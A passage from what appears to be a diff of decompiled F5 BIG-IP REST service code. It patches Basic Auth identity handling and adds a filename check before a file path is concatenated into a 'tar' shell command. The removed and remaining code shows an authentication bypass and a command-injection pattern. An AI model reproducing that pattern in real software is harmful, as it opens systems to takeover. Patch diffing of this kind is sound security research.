(RestHelper.getOperationTracingLevel().intValue() <= Level.FINER.intValue()) {\n \n copy.responseHeadersTrace = this.responseHeadersTrace;\n copy.requestHeadersTrace = this.requestHeadersTrace;\n }\n \n if (this.additionalHeaders != null && this.additionalHeaders[0] != null) {\n copy.allocateHttpHeaders();\n 
copy.additionalHeaders[Direction.REQUEST.getIndex()] = (HttpHeaderFields)this.additionalHeaders[Direction.REQUEST.getIndex()].clone();\n }\n \n \n if (this.additionalHeaders != null && this.additionalHeaders[1] != null) {\n copy.allocateHttpHeaders();\n copy.additionalHeaders[Direction.RESPONSE.getIndex()] = (HttpHeaderFields)this.additionalHeaders[Direction.RESPONSE.getIndex()].clone();\n }\n \n \n \n copy.isRestErrorResponseRequired = this.isRestErrorResponseRequired;\n copy.isPublicRequest = this.isPublicRequest;\n copy.senderNote = this.senderNote;\n copy.gossipHeader = this.gossipHeader;\n \n \n \n return copy;\n }\n \n \n \n \n \n \n \n \n public static String toJson(Object src) {\n return gson.toJson(src);\n }\n \n \n \n \n \n \n \n \n public static JsonElement toJsonTree(String src) {\n return (new JsonParser()).parse(src);\n }\n \n \n \n \n \n \n \n \n public static JsonElement toJsonTree(Object src) {\n return gson.toJsonTree(src);\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public static String toJsonWithEnumValues(Object src) {\n return extendedGson.toJson(src);\n }\n \n \n \n \n \n \n \n \n \n public static <T> T fromJson(String json, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(json, classOfT);\n }\n \n \n \n \n \n \n \n \n \n public static <T> T fromJson(Reader json, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(json, classOfT);\n }\n \n \n \n \n \n \n \n \n \n \n \n public static <T> T fromJson(JsonElement parsedJson, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(parsedJson, classOfT);\n }\n \n \n \n \n \n \n \n \n \n \n public static <T> T fromObject(Object src, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(gson.toJson(src), classOfT);\n }\n \n \n \n \n \n \n \n \n public RestOperation nestCompletion(final RestRequestCompletion beforeCompletion) {\n final RestRequestCompletion original = this.completion;\n 
RestRequestCompletion wrapper = new RestRequestCompletion()\n {\n public void completed(RestOperation request)\n {\n request.resetCompletionCount();\n request.setCompletion(original);\n beforeCompletion.completed(RestOperation.this);\n }\n \n \n public void failed(Exception ex, RestOperation request) {\n request.resetCompletionCount();\n request.setCompletion(original);\n beforeCompletion.failed(ex, request);\n }\n };\n \n return setCompletion(wrapper);\n }\n }\n diff --git a/com/f5/rest/common/RestOperationIdentifier.java b/com/f5/rest/common/RestOperationIdentifier.java\n index d7941ba..cf955b9 100644\n --- a/com/f5/rest/common/RestOperationIdentifier.java\n +++ b/com/f5/rest/common/RestOperationIdentifier.java\n 
@@ -1,249 +1,334 @@\n package com.f5.rest.common;\n \n +import com.f5.rest.tmos.bigip.authn.providers.mcpremote.TmosAuthProviderCollectionWorker;\n import com.f5.rest.workers.AuthTokenItemState;\n +import com.f5.rest.workers.ForwarderPassThroughWorker;\n +import com.f5.rest.workers.authn.providers.AuthProviderLoginState;\n import com.f5.rest.workers.authz.AuthzHelper;\n import com.f5.rest.workers.device.DeviceCertificateState;\n import java.net.URI;\n +import java.net.URISyntaxException;\n import java.security.interfaces.RSAPublicKey;\n \n \n \n \n \n \n \n \n \n +\n +\n +\n +\n +\n +\n public class RestOperationIdentifier\n {\n private static RestLogger LOGGER = new RestLogger(RestOperationIdentifier.class, null);\n \n + static final String TMOS_AUTH_LOGIN_PROVIDER_WORKER_URI_PATH = TmosAuthProviderCollectionWorker.WORKER_URI_PATH + \"/\" + TmosAuthProviderCollectionWorker.generatePrimaryKey(\"tmos\") + \"/login\";\n +\n +\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public static void setIdentityFromAuthenticationData(RestOperation request, Runnable completion) {\n if (setIdentityFromDeviceAuthToken(request, completion)) {\n return;\n }\n if (setIdentityFromF5AuthToken(request)) {\n completion.run();\n return;\n }\n - if (setIdentityFromBasicAuth(request)) {\n - completion.run();\n -\n + if (setIdentityFromBasicAuth(request, completion)) {\n return;\n }\n +\n completion.run();\n }\n \n \n \n \n \n \n \n \n public static void updateIdentityFromAuthenticationData(RestOperation request) {\n if (getRequestDeviceAuthToken(request) != null) {\n return;\n }\n \n \n if (setIdentityFromF5AuthToken(request)) {\n return;\n }\n - if (setIdentityFromBasicAuth(request)) {\n + if (setIdentityFromBasicAuth(request, null)) {\n return;\n }\n }\n \n \n \n \n private static String getRequestDeviceAuthToken(RestOperation request) {\n return request.getParameter(\"em_server_auth_token\");\n }\n \n \n \n \n \n \n \n \n private static boolean 
setIdentityFromDeviceAuthToken(final RestOperation incomingRequest, final Runnable finalRunnable) {\n final String authToken = getRequestDeviceAuthToken(incomingRequest);\n if (authToken == null) {\n return false;\n }\n final String ipAddress = incomingRequest.getParameter(\"em_server_ip\");\n \n \n \n boolean isCmiKey = Boolean.parseBoolean(incomingRequest.getParameter(\"em_cmi_key\"));\n \n \n \n \n \n \n if (WellKnownPorts.getUseDeviceGroupKeyPairs() || WellKnownPorts.getUseBothDeviceAndGroupCertificates() || isCmiKey)\n {\n return setIdentityFromDeviceAuthTokenOnDisk(incomingRequest, finalRunnable, authToken, ipAddress, isCmiKey);\n }\n \n \n URI certificateUri = UrlHelper.buildLocalUriSafe(incomingRequest.getUri().getPort(), new String[] { \"shared/device-certificates\", ipAddress });\n \n \n \n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void completed(RestOperation certRequest) {\n DeviceCertificateState certificate = certRequest.<DeviceCertificateState>getTypedBody(DeviceCertificateState.class);\n \n RestOperationIdentifier.setIdentityFromDeviceAuthToken(authToken, certificate.certificate.getBytes(), certificate.deviceUserReference, incomingRequest);\n \n \n \n finalRunnable.run();\n }\n \n \n \n \n \n public void failed(Exception exception, RestOperation certRequest) {\n RestOperationIdentifier.LOGGER.fineFmt(\"Get device-certificate %s for %s: %s\", new Object[] { this.val$ipAddress, this.val$incomingRequest.getReferer(), exception });\n \n finalRunnable.run();\n }\n };\n \n RestOperation certRequest = RestOperation.create().setUri(certificateUri).setCompletion(completion).setReferer(RestOperationIdentifier.class.getName());\n \n \n \n RestRequestSender.sendGet(certRequest);\n return true;\n }\n \n \n \n \n \n \n \n private static boolean setIdentityFromDeviceAuthTokenOnDisk(final RestOperation incomingRequest, final Runnable finalRunnable, final String authToken, final String ipAddress, final boolean isCmiKey) {\n 
DeviceAuthTokenHelper.getPublicKeyBytes(ipAddress, isCmiKey, new CompletionHandler<byte[]>()\n {\n public void completed(byte[] data)\n {\n RestOperationIdentifier.setIdentityFromDeviceAuthToken(authToken, data, null, incomingRequest);\n finalRunnable.run();\n }\n \n \n \n \n public void failed(Exception exception, byte[] data) {\n RestOperationIdentifier.LOGGER.fineFmt(\"Read public key %s/%s for %s: %s\", new Object[] { this.val$ipAddress, Boolean.valueOf(this.val$isCmiKey), this.val$incomingRequest.getReferer(), exception });\n \n finalRunnable.run();\n }\n });\n \n return true;\n }\n \n \n \n \n \n \n \n \n \n \n \n \n private static void setIdentityFromDeviceAuthToken(String authToken, byte[] publicKeyBytes, RestReference deviceUserReference, RestOperation request) {\n RSAPublicKey publicKey;\n DeviceAuthToken deviceAuthToken;\n try {\n publicKey = DeviceAuthTokenHelper.makePublicKeyFromBytes(publicKeyBytes);\n } catch (Exception exception) {\n \n \n LOGGER.warningFmt(\"Public key file on disk error: %s\", new Object[] { RestHelper.throwableStackToString(exception) });\n \n \n return;\n }\n \n try {\n deviceAuthToken = DeviceAuthTokenHelper.decryptAuthToken(authToken, publicKey);\n } catch (Exception exception) {\n LOGGER.fineFmt(\"Invalid auth token %s from %s: %s\", new Object[] { authToken, request.getReferer(), exception });\n \n return;\n }\n \n LOGGER.finestFmt(\"token timestamp=%s\", new Object[] { Integer.valueOf(deviceAuthToken.getTimestamp()) });\n \n if (deviceUserReference == null) {\n deviceUserReference = AuthzHelper.getDefaultAdminReference();\n }\n request.setIdentityData(null, deviceUserReference, null);\n \n \n request.setTrustedRequest(true);\n }\n \n \n \n \n private static boolean setIdentityFromF5AuthToken(RestOperation request) {\n AuthTokenItemState token = request.getXF5AuthTokenState();\n if (token == null) {\n return false;\n }\n request.setIdentityData(token.userName, token.user, AuthzHelper.toArray(token.groupReferences));\n \n 
return true;\n }\n \n \n \n \n - private static boolean setIdentityFromBasicAuth(RestOperation request) {\n +\n +\n + private static boolean setIdentityFromBasicAuth(final RestOperation request, final Runnable runnable) {\n String authHeader = request.getBasicAuthorization();\n if (authHeader == null) {\n return false;\n }\n - AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n - request.setIdentityData(components.userName, null, null);\n + final AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n +\n +\n +\n +\n +\n + String xForwardedHostHeaderValue = request.getAdditionalHeader(\"X-Forwarded-Host\");\n +\n +\n +\n + if (xForwardedHostHeaderValue == null) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n +\n + String[] valueList = xForwardedHostHeaderValue.split(\", \");\n + int valueIdx = (valueList.length > 1) ? (valueList.length - 1) : 0;\n + if (valueList[valueIdx].contains(\"localhost\") || valueList[valueIdx].contains(\"127.0.0.1\")) {\n +\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n + if (!PasswordUtil.isPasswordReset().booleanValue()) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n + AuthProviderLoginState loginState = new AuthProviderLoginState();\n + loginState.username = components.userName;\n + loginState.password = components.password;\n + loginState.address = request.getRemoteSender();\n + RestRequestCompletion authCompletion = new RestRequestCompletion()\n + {\n + public void completed(RestOperation subRequest) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n +\n +\n + public void failed(Exception ex, 
RestOperation subRequest) {\n + RestOperationIdentifier.LOGGER.warningFmt(\"Failed to validate %s\", new Object[] { ex.getMessage() });\n + if (ex.getMessage().contains(\"Password expired\")) {\n + request.fail(new SecurityException(ForwarderPassThroughWorker.CHANGE_PASSWORD_NOTIFICATION));\n + }\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n + };\n +\n + try {\n + RestOperation subRequest = RestOperation.create().setBody(loginState).setUri(UrlHelper.makeLocalUri(new URI(TMOS_AUTH_LOGIN_PROVIDER_WORKER_URI_PATH), null)).setCompletion(authCompletion);\n +\n +\n + RestRequestSender.sendPost(subRequest);\n + } catch (URISyntaxException e) {\n + LOGGER.warningFmt(\"ERROR: URISyntaxEception %s\", new Object[] { e.getMessage() });\n + }\n return true;\n }\n }\n diff --git a/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java b/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java\n index afc6890..7a0fe79 100644\n --- a/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java\n +++ b/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java\n 
@@ -1,788 +1,803 @@\n package com.f5.rest.tmos.bigip.access.iapp;\n \n import com.f5.rest.common.CompletionHandler;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestThreadManager;\n import com.f5.rest.common.UrlHelper;\n import com.f5.rest.common.Utilities;\n import com.f5.rest.common.VersionUtil;\n import com.f5.rest.tmos.bigip.access.util.LangUtil;\n import com.f5.rest.workers.DeviceInfoState;\n import com.f5.rest.workers.device.DeviceInfoWorker;\n import com.f5.rest.workers.iapp.IAppPackageManagementTaskCollectionWorker;\n import com.f5.rest.workers.iapp.IAppPackageManagementTaskState;\n import com.f5.rest.workers.iapp.packaging.GlobalInstalledPackageCollectionWorker;\n import com.f5.rest.workers.iapp.packaging.InstalledPackageCollectionState;\n import com.f5.rest.workers.iapp.packaging.InstalledPackageState;\n import com.f5.rest.workers.shell.ShellExecutionResult;\n import com.f5.rest.workers.shell.ShellExecutor;\n import com.f5.rest.workers.task.AbstractTaskCollectionWorker;\n import com.f5.rest.workers.task.TaskCompletion;\n import com.f5.rest.workers.task.TaskItemState;\n import com.google.gson.JsonObject;\n import java.io.ByteArrayInputStream;\n import java.io.File;\n import java.io.IOException;\n import java.io.InputStream;\n import java.io.InputStreamReader;\n import java.net.URI;\n import java.nio.ByteBuffer;\n import java.nio.channels.AsynchronousFileChannel;\n import java.nio.channels.CompletionHandler;\n import java.nio.file.OpenOption;\n import java.nio.file.Path;\n import java.nio.file.Paths;\n import java.nio.file.StandardOpenOption;\n import java.util.ArrayList;\n import java.util.Date;\n import java.util.concurrent.TimeUnit;\n +import java.util.regex.Matcher;\n +import java.util.regex.Pattern;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 
public class IAppBundleInstallTaskCollectionWorker\n extends AbstractTaskCollectionWorker<IAppBundleInstallTaskState, IAppBundleInstallCollectionState>\n {\n private static final String AGC_USE_CASE_PACK_BUILD_NOT_FOUND = \"Access Guided Configuration use case pack name does not contain build number\";\n private static final String AGC_PACK_NOT_FOUND = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n public static final String IAPP_BUNDLE_INSTALL_TASKS_SEGMENT = \"bundle-install-tasks\";\n public static final String WORKER_URI_PATH = UrlHelper.buildUriPath(new String[] { \"tm/\", \"access\", \"bundle-install-tasks\" });\n \n \n private static final String ERROR_TASK_BODY_INVALID = \"IApp bundle install task body is invalid.\";\n \n +\n private static final String TAR_FILE_PATH = \"/var/apm/f5-iappslx-agc-usecase-pack/\";\n \n private static final String RPMS_FILE_PATH = \"/var/config/rest/downloads/\";\n \n private static final String FRAMEWORK = \"framework\";\n \n private static final String AGC_USECASE_PACK_INFO_WORKER_URI_PATH = \"/mgmt/tm/access/usecase-pack-info\";\n \n private static final String AGC_USE_CASE_PACK_VERSION = \"usecasePackVersion\";\n \n private static final String AGC_USE_CASE_PACK_BUILD = \"usecasePackBuild\";\n \n private String bigIpVersion;\n \n private static final int MAX_RETRY_COUNT = 5;\n \n private static final int RETRY_WAIT_TIME_MULTIPLIER = 5000;\n \n + private static final Pattern validFilePathChars = Pattern.compile(\"(^[a-zA-Z][a-zA-Z0-9_.\\\\-\\\\s()]*)\\\\.([tT][aA][rR]\\\\.[gG][zZ])$\");\n \n public IAppBundleInstallTaskCollectionWorker() {\n super(IAppBundleInstallTaskState.class, IAppBundleInstallCollectionState.class);\n \n \n this.state = new IAppBundleInstallCollectionState();\n \n \n \n setReplicated(false);\n \n setIndexed(true);\n \n \n \n \n \n \n \n \n \n setIsObliteratedOnDelete(true);\n \n configureTaskJanitor(TimeUnit.HOURS.toMillis(1L), 
TimeUnit.DAYS.toMillis(1L));\n }\n \n \n \n \n public void onStart(RestServer server) {\n completeStart(IAppBundleInstallCollectionState.class, new URI[] { buildLocalUri(new String[] { IAppPackageManagementTaskCollectionWorker.WORKER_URI_PATH }) });\n }\n \n \n \n \n \n \n \n \n public void validateTaskRequest(IAppBundleInstallTaskState taskState) throws Exception {\n if (taskState == null) {\n throw new IllegalArgumentException(\"IApp bundle install task body is invalid.\");\n }\n }\n \n \n \n \n \n protected void startTask(IAppBundleInstallTaskState taskState) {\n taskState.status = TaskItemState.Status.STARTED;\n if (taskState.startTime == null) {\n taskState.startTime = new Date();\n }\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.VALIDATE_GZIP_BUNDLE;\n sendStatusUpdate(taskState);\n }\n \n \n \n \n \n public void processTaskStep(IAppBundleInstallTaskState taskState, Object userData) {\n int retryCount;\n switch (taskState.step) {\n case VALIDATE_GZIP_BUNDLE:\n validateGzipBundle(taskState);\n return;\n case QUERY_INSTALLED_RPM:\n queryInstalledRpm(taskState);\n return;\n case QUERY_BIGIP_VERSION:\n queryBigipVersion(taskState);\n return;\n case EXTRACT_RPMS_FROM_BUNDLE:\n extractRpmsFromBundle(taskState);\n return;\n case READ_MANIFEST_FILE:\n readManifestFile(taskState);\n return;\n case FILTER_RPMS_ON_MIN_BIGIP_VERSION_REQUIRED:\n filterRpmsOnMinBigipVersionRequired(taskState);\n return;\n case INSTALL_FRAMEWORK_RPM:\n installFrameworkRpmInBundle(taskState);\n return;\n case INSTALL_APP_RPMS:\n installAppRpmsInBundle(taskState);\n return;\n case UPDATE_USECASE_PACK_VERSION:\n retryCount = 0;\n if (userData != null) {\n retryCount = ((Integer)userData).intValue();\n }\n updateUsecasePackVersion(taskState, retryCount);\n return;\n case DONE:\n taskState.status = TaskItemState.Status.FINISHED;\n sendStatusUpdate(taskState);\n return;\n }\n throw new IllegalStateException(\"Unknown IApp bundle install task step: \" + taskState.step);\n }\n 
\n \n \n \n \n private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {\n if (Utilities.isNullOrEmpty(taskState.filePath)) {\n File agcUseCasePackDir = new File(\"/var/apm/f5-iappslx-agc-usecase-pack/\");\n if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {\n String error = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n File[] agcUseCasePack = agcUseCasePackDir.listFiles();\n if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {\n \n String error = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n taskState.filePath = agcUseCasePack[0].getPath();\n }\n \n + String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);\n + Matcher m = validFilePathChars.matcher(filename);\n + if (!m.matches()) {\n + String errorMessage = String.format(\"Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). 
Only a .tar.gz file is allowed\", new Object[] { filename });\n +\n +\n +\n + failTask(taskState, errorMessage, \"\");\n +\n + return;\n + }\n final String extractTarCommand = \"tar -xf \" + taskState.filePath + \" -O > /dev/null\";\n \n \n ShellExecutor extractTar = new ShellExecutor(extractTarCommand);\n \n CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()\n {\n public void completed(ShellExecutionResult extractQueryResult)\n {\n if (extractQueryResult.getExitStatus().intValue() != 0) {\n String error = extractTarCommand + \" failed with exit code=\" + extractQueryResult.getExitStatus();\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.\", error + \"stdout + stderr=\" + extractQueryResult.getOutput());\n \n \n return;\n }\n \n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. 
Please ensure that usecase pack is a valid tar archive.\", String.format(\"%s failed\", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));\n }\n };\n \n \n \n extractTar.startExecution(executionFinishedHandler);\n }\n \n \n private void queryInstalledRpm(final IAppBundleInstallTaskState taskState) {\n RestRequestCompletion queryCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n InstalledPackageCollectionState installedPackages = (InstalledPackageCollectionState)operation.getTypedBody(InstalledPackageCollectionState.class);\n \n \n if (installedPackages != null) {\n taskState.alreadyInstalledRpmsInfo = new ArrayList<>();\n for (InstalledPackageState installedPackage : installedPackages.items) {\n taskState.alreadyInstalledRpmsInfo.add(new IAppBundleInstallTaskState.RpmPackageInfo(installedPackage.appName, installedPackage.version, installedPackage.release, installedPackage.arch, \"\"));\n }\n }\n \n \n \n \n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_BIGIP_VERSION;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n taskState.errorMessage = String.format(\"Failed to query Global Installed Package Worker: %s\", new Object[] { exception.getMessage() });\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, taskState.errorMessage, RestHelper.throwableStackToString(exception));\n }\n };\n \n \n RestOperation queryOperation = RestOperation.create().setCompletion(queryCompletion).setUri(buildLocalUri(new String[] { GlobalInstalledPackageCollectionWorker.WORKER_URI_PATH }));\n \n \n \n \n sendGet(queryOperation);\n }\n \n \n \n private void queryBigipVersion(final IAppBundleInstallTaskState taskState) {\n RestRequestCompletion queryCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n 
DeviceInfoState infoState = (DeviceInfoState)operation.getTypedBody(DeviceInfoState.class);\n IAppBundleInstallTaskCollectionWorker.this.bigIpVersion = infoState.version;\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.EXTRACT_RPMS_FROM_BUNDLE;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n taskState.errorMessage = String.format(\"Failed to query BigIP version from DeviceInfo Worker: %s\", new Object[] { exception.getMessage() });\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, taskState.errorMessage, RestHelper.throwableStackToString(exception));\n }\n };\n \n \n RestOperation queryOperation = RestOperation.create().setCompletion(queryCompletion).setUri(buildLocalUri(new String[] { DeviceInfoWorker.WORKER_URI_PATH }));\n \n \n \n \n sendGet(queryOperation);\n }\n \n \n private void extractRpmsFromBundle(final IAppBundleInstallTaskState taskState) {\n final String extractTarCommand = \"tar -xvf \" + taskState.filePath + \" --directory \" + \"/var/config/rest/downloads/\";\n \n ShellExecutor extractTar = new ShellExecutor(extractTarCommand);\n \n CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()\n {\n public void completed(ShellExecutionResult extractTarResult)\n {\n if (extractTarResult.getExitStatus().intValue() != 0) {\n String error = extractTarCommand + \" failed with exit code=\" + extractTarResult.getExitStatus();\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Validate usecase pack by extracting iApps failed\", error + \"stdout + stderr=\" + extractTarResult.getOutput());\n \n \n \n return;\n }\n \n \n populateRpmsToBeInstalled(taskState, extractTarResult);\n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.READ_MANIFEST_FILE;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n 
}\n \n \n \n \n private void populateRpmsToBeInstalled(IAppBundleInstallTaskState taskState, ShellExecutionResult extractTarResult) {\n ArrayList<IAppBundleInstallTaskState.RpmPackageInfo> alreadyInstalledRpms = new ArrayList<>();\n taskState.appRpmsInfo = new ArrayList<>();\n \n String[] rpmsToBeInstalled = extractTarResult.getOutput().split(\"\\\\n\");\n \n \n for (int i = 0; i < rpmsToBeInstalled.length; i++) {\n \n if (isManifestFile(rpmsToBeInstalled[i])) {\n taskState.manifestFileName = rpmsToBeInstalled[i];\n }\n else {\n \n IAppBundleInstallTaskState.RpmPackageInfo rpmToBeInstalled = getRpmPackageInfo(rpmsToBeInstalled[i]);\n \n if (!rpmToBeInstalled.error.equals(\"\")) {\n updateRpmStatus(taskState, rpmsToBeInstalled[i], IAppBundleInstallTaskState.RpmStatus.ERRORED, rpmToBeInstalled.error);\n }\n else if (isRpmInstallRequired(rpmToBeInstalled)) {\n updateRpmStatus(taskState, rpmsToBeInstalled[i], IAppBundleInstallTaskState.RpmStatus.EXTRACTED, \"\");\n } else {\n \n alreadyInstalledRpms.add(rpmToBeInstalled);\n }\n }\n } taskState.alreadyInstalledRpmsInfo = alreadyInstalledRpms;\n }\n \n private boolean isManifestFile(String fileName) {\n int index = fileName.lastIndexOf('.');\n if (index != -1 && fileName.substring(index + 1).equals(\"json\"))\n {\n return true;\n }\n return false;\n }\n \n \n \n \n private void updateRpmStatus(IAppBundleInstallTaskState taskState, String rpmToBeInstalled, IAppBundleInstallTaskState.RpmStatus rpmStatus, String error) {\n if (rpmToBeInstalled.contains(\"framework\")) {\n taskState.frameworkRpmInfo = new IAppBundleInstallTaskState.RpmInfo(rpmToBeInstalled, rpmStatus, error);\n } else {\n \n taskState.appRpmsInfo.add(new IAppBundleInstallTaskState.RpmInfo(rpmToBeInstalled, rpmStatus, error));\n }\n }\n \n \n private boolean isRpmInstallRequired(IAppBundleInstallTaskState.RpmPackageInfo rpmToBeInstalled) {\n if (taskState.alreadyInstalledRpmsInfo == null || taskState.alreadyInstalledRpmsInfo.isEmpty())\n {\n return true;\n 
}\n for (IAppBundleInstallTaskState.RpmPackageInfo alreadyInstalledRpm : taskState.alreadyInstalledRpmsInfo) {\n if (alreadyInstalledRpm.name.equals(rpmToBeInstalled.name)) {\n if (VersionUtil.compareVersion(alreadyInstalledRpm.version, rpmToBeInstalled.version) > 0) {\n \n \n rpmToBeInstalled.error = createAlreadyInstalledRpmErrorMessage(rpmToBeInstalled, alreadyInstalledRpm);\n \n return false;\n } if (VersionUtil.compareVersion(alreadyInstalledRpm.version, rpmToBeInstalled.version) == 0)\n {\n \n if (VersionUtil.compareBuild(alreadyInstalledRpm.release, rpmToBeInstalled.release) >= 0) {\n \n \n createAlreadyInstalledRpmErrorMessage(rpmToBeInstalled, alreadyInstalledRpm);\n \n return false;\n }\n }\n break;\n }\n }\n return true;\n }\n \n \n \n private String createAlreadyInstalledRpmErrorMessage(IAppBundleInstallTaskState.RpmPackageInfo rpmToBeInstalled, IAppBundleInstallTaskState.RpmPackageInfo alreadyInstalledRpm) {\n return rpmToBeInstalled.error = \"Installed rpm version is \" + alreadyInstalledRpm.version + \" and release is \" + alreadyInstalledRpm.release;\n }\n \n \n \n private IAppBundleInstallTaskState.RpmPackageInfo getRpmPackageInfo(String rpmFileName) {\n IAppBundleInstallTaskState.RpmPackageInfo rpmPackageInfo = new IAppBundleInstallTaskState.RpmPackageInfo(\"\", \"\", \"\", \"\", \"\");\n \n \n \n int index = rpmFileName.lastIndexOf('.');\n if (index == -1 || !rpmFileName.substring(index + 1).equals(\"rpm\")) {\n \n rpmPackageInfo.error = \"Not a rpm file\";\n return rpmPackageInfo;\n }\n rpmFileName = rpmFileName.substring(0, index);\n \n index = rpmFileName.lastIndexOf('.'); String subStr;\n if (index == -1 || !(subStr = rpmFileName.substring(index + 1)).equals(\"noarch\")) {\n \n \n rpmPackageInfo.error = \"Invalid file name format - 'arch' not found in file name\";\n return rpmPackageInfo;\n }\n rpmPackageInfo.arch = subStr;\n rpmFileName = rpmFileName.substring(0, index);\n \n index = rpmFileName.lastIndexOf('-');\n if (index == -1 || (subStr 
= rpmFileName.substring(index + 1)).length() == 0 || !Character.isDigit(subStr.charAt(0))) {\n \n \n rpmPackageInfo.error = \"Invalid file name format - release not found in file name\";\n return rpmPackageInfo;\n }\n rpmPackageInfo.release = subStr;\n rpmFileName = rpmFileName.substring(0, index);\n \n index = rpmFileName.lastIndexOf('-');\n if (index == -1 || (subStr = rpmFileName.substring(index + 1)).length() == 0 || !Character.isDigit(subStr.charAt(0))) {\n \n \n rpmPackageInfo.error = \"Invalid file name format - version not found in file name\";\n return rpmPackageInfo;\n }\n rpmPackageInfo.version = subStr;\n \n rpmPackageInfo.name = rpmFileName.substring(0, index);\n if (rpmPackageInfo.name.length() == 0) {\n rpmPackageInfo.error = \"Invalid file name format - name not found in file name\";\n return rpmPackageInfo;\n }\n return rpmPackageInfo;\n }\n \n \n public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Extract iApps from usecase pack failed\", String.format(\"%s failed\", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));\n }\n };\n \n \n extractTar.startExecution(executionFinishedHandler);\n }\n \n \n \n private void readManifestFile(final IAppBundleInstallTaskState taskState) {\n if (LangUtil.isNullOrEmpty(taskState.manifestFileName)) {\n failTask(taskState, \"Access Guided Configuration use case pack does not contain manifest file.\", \"\");\n \n return;\n }\n \n final CompletionHandler<Integer, ByteBuffer> completion = new CompletionHandler<Integer, ByteBuffer>()\n {\n public void completed(Integer result, ByteBuffer bb) {\n InputStream in = new ByteArrayInputStream(bb.array());\n InputStreamReader inr = new InputStreamReader(in);\n taskState.manifest = (IAppBundleInstallTaskState.Manifest)RestOperation.fromJson(inr, IAppBundleInstallTaskState.Manifest.class);\n \n taskState.step = 
